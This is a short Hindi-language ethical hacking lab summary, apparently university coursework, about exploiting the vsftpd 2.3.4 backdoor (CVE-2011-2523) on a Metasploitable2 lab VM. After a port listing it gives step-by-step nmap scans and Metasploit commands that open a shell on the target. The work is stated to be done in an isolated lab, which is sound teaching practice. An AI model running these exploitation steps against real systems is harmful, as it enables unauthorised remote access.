
नैतिक हैकिंग मूल्यांकन | Metasploitable2 पर vsftpd 2.3.4 बैकडोर (CVE-2011-2523) का Kali Linux और Metasploit का उपयोग करके व्यावहारिक भेद्यता परीक्षण
मॉड्यूल: - नैतिक हैकिंग विश्वविद्यालय: लंदन मेट्रोपॉलिटन विश्वविद्यालय कार्यक्रम: BSc (ऑनर्स) साइबर सुरक्षा और फोरेंसिक विज्ञान
सभी गतिविधियाँ केवल शैक्षणिक उद्देश्यों के लिए एक नियंत्रित, पृथक आभासी प्रयोगशाला में संचालित की गईं। किसी भी वास्तविक दुनिया के सिस्टम को लक्षित नहीं किया गया। सभी कार्य कंप्यूटर मिसयूज़ एक्ट 1990 का अनुपालन करते हैं।
पोर्ट 21/tcp - vsftpd 2.3.4 (लक्ष्य) पोर्ट 22/tcp - OpenSSH 4.7p1 पोर्ट 23/tcp - Linux telnetd पोर्ट 80/tcp - Apache httpd 2.2.8 पोर्ट 139/tcp - Samba smbd 3.X पोर्ट 445/tcp - Samba smbd 3.X पोर्ट 3306/tcp - MySQL 5.0.51a पोर्ट 6667/tcp - UnrealIRCd
चरण 1: nmap -sn 192.168.56.0/24 चरण 2: nmap -sV 192.168.56.103 चरण 3: msfconsole चरण 4: use exploit/unix/ftp/vsftpd_234_backdoor चरण 5: set RHOSTS 192.168.56.103 चरण 6: set LHOST 192.168.56.1 चरण 7: run चरण 8: id && whoami